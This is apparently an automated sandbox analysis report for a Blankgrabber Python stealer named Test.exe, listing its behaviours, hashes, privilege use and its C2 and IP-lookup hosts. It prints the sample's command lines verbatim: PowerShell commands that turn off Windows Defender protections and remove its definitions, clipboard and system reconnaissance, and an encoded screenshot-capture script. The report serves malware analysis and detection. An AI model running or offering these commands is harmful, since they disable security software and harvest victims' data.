Analysis Overview
SHA256
45f1bde758b218562cc91da3dd5a14ab0974a9d12c345dd522f9696a1ae901ca
Threat Level: Known bad
The file Test.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
UPX packed file
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Enumerates processes with tasklist
Detects videocard installed
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Gathers system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 10:16
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 10:16
Reported
2024-06-03 10:19
Platform
win7-20240221-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2076 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | C:\Users\Admin\AppData\Local\Temp\Test.exe |
| PID 2076 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | C:\Users\Admin\AppData\Local\Temp\Test.exe |
| PID 2076 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | C:\Users\Admin\AppData\Local\Temp\Test.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI20762\python311.dll
| MD5 | ccdbd8027f165575a66245f8e9d140de |
| SHA1 | d91786422ce1f1ad35c528d1c4cd28b753a81550 |
| SHA256 | 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971 |
| SHA512 | 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311 |
memory/1296-23-0x000007FEF5EF0000-0x000007FEF64E2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 10:16
Reported
2024-06-03 10:19
Platform
win10v2004-20240426-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAA